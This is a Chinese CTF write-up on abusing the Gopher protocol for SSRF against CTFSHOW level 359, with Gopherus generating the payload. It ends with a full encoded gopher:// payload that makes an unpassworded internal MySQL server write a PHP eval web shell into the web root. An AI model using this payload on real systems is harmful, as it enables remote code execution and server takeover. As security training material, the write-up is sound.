GOPHER协议

GOPHER协议是一种比HTTP协议还要古老的协议，默认工作端口70，但是gopher协议在SSRF漏洞利用上比HTTP协议更有优势。GOPHER协议可以以单个URL的形式传递POST请求，同时支持换行。

GOPHER协议发起的格式

关于GET型和POST型的构造参考我得另外一篇博客即可：SSRF漏洞_貌美不及玲珑心，贤妻扶我青云志的博客-CSDN博客

GOPHER利用工具

推荐一个项目：GitHub - tarunkant/Gopherus: This tool generates gopher link for exploiting SSRF and gaining RCE in various servers

该项目是基于GOPHER协议生成Payload，对SSRF漏洞进行验证

支持多种数据库

案例：CTFSHOW-359关

链接地址：ctf.show

该环境mysql是无密码的

（1）抓包登陆处

这里会远程请求check.php

URL解码retur1处的参数，解码结果：https://404.chall.ctf.show/

这里会远程请求资源地址，测试SSRF漏洞

（2）使用gopher协议利用工具

注意该工具需要运行在Linux系统上，并且运行环境为python 2.x，还需要有执行权限才行

（3）需要对下划线后面的在进行一次URL编码（防止出现特殊字符，后端 curl 接收到参数后会默认解码一次）

UrlEncode编码/UrlDecode解码 - 站长工具

gopher://127.0.0.1:3306/_%25a3%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2572%256f%256f%2574%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%254c%2500%2500%2500%2503%2573%2565%256c%2565%2563%2574%2520%2522%253c%253f%2570%2568%2570%2520%2540%2565%2576%2561%256c%2528%2524%255f%2550%254f%2553%2554%255b%2527%2563%256d%2564%2527%255d%2529%253b%253f%253e%2522%2520%2569%256e%2574%256f%2520%256f%2575%2574%2566%2569%256c%2565%2520%2527%252f%2576%2561%2572%252f%2577%2577%2577%252f%2568%2574%256d%256c%252f%2561%2561%252e%2570%2568%2570%2527%253b%2501%2500%2500%2500%2501